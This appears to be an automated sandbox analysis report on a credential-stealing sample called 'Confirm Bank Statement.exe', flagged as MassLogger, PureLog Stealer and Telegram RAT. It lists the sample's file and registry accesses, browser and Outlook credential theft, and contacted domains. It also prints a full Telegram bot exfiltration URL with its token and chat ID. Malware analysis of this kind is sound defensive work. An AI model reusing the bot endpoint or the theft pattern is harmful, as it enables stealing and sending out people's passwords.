                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Users\user\Desktop\Confirm Bank Statement.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.7240000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.3431648.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.7240000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.3431648.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.320f83c.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.3156edc.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1274255090.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1267719440.000000000313C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.7240000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.3431648.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.7240000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.3431648.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.320f83c.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.3156edc.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1274255090.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1267719440.000000000313C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading                    		11
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    Query Registry                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Security Software Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                    Virtualization/Sandbox Evasion                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin Shares1
                    Data from Local System                    		1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection                    		NTDS31
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Software Packing                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSync1
                    File and Directory Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                    System Information Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Confirm Bank Statement.exe32%VirustotalBrowse
                    Confirm Bank Statement.exe42%ReversingLabsByteCode-MSIL.Virus.Virut
                    Confirm Bank Statement.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		104.21.64.1
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		132.226.8.169
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://checkip.dyndns.org/false
                              		high
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                		high
                                https://api.telegram.org/bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780630805&caption=user%20/%20Passwords%20/%208.46.123.189false
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://api.telegram.orgConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://reallyfreegeoip.org/xml/8.46.123.189lConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/botConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://checkip.dyndns.comdConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://checkip.dyndns.org/qConfirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
                                              http://reallyfreegeoip.orgdConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://reallyfreegeoip.org/xml/8.46.123.189dConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://reallyfreegeoip.orgConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.orgdConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://reallyfreegeoip.orgConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://api.telegram.orgdConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://checkip.dyndns.orgConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://checkip.dyndns.comConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://api.telegram.orgConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://checkip.dyndns.org/dConfirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameConfirm Bank Statement.exe, 00000000.00000002.1267719440.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.telegram.org/bot-/sendDocument?chat_id=Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://reallyfreegeoip.org/xml/Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Confirm Bank Statement.exe, 00000004.00000002.3720612902.0000000002A0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        132.226.8.169
                                                                        		checkip.dyndns.comUnited States
                                                                        		16989UTMEMUSfalse
                                                                        149.154.167.220
                                                                        		api.telegram.orgUnited Kingdom
                                                                        		62041TELEGRAMRUfalse
                                                                        104.21.64.1
                                                                        		reallyfreegeoip.orgUnited States
                                                                        		13335CLOUDFLARENETUSfalse

                                                                        General Information

                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1590892
                                                                        Start date and time:2025-01-14 16:42:25 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 7m 50s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:18
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Confirm Bank Statement.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@6/6@3/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 266
                                                                        • Number of non-executed functions: 44
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 4.245.163.56
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        10:43:21API Interceptor10359734x Sleep call for process: Confirm Bank Statement.exe modified
                                                                        10:43:22API Interceptor11x Sleep call for process: powershell.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        132.226.8.169PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        149.154.167.220q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            12.exeGet hashmaliciousUnknownBrowse
                                                                              12.exeGet hashmaliciousUnknownBrowse
                                                                                PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                      QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
